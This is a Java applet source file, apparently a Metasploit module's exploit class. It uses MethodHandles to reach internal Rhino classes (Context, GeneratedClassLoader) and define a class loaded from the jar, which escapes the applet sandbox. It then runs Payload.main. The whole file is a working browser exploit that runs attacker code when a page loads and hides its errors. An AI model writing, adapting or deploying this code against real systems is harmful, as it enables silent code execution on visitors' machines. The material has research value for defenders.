import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import metasploit.Payload;
//import java.lang.Runtime;
import java.applet.Applet;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.Method;

public class Exploit extends Applet
{
	
    public Exploit()
    {
    }

    public void init()
    {
        try
        {
			
            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            byte[] buffer = new byte[8192];
            int length;

            // read in the class file from the jar
            InputStream is = getClass().getResourceAsStream("B.class");
            // and write it out to the byte array stream
            while( ( length = is.read( buffer ) ) > 0 )
                bos.write( buffer, 0, length );
            // convert it to a simple byte array
            buffer = bos.toByteArray();
			
            MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
            MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
            MethodHandle localMethodHandle0 = localLookup.findStatic(Class.class, "forName", localMethodType0);
            Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
            Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
            MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
            MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
            MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
            MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
            Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
            MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
            MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
            MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
            MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
            Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
            MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
            MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
            Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
            localClass3.newInstance();
            Payload.main(null);
            //Runtime.getRuntime().exec("calc.exe");
        }
        catch(Throwable ex)
        {
            //ex.printStackTrace();
        }
    }

}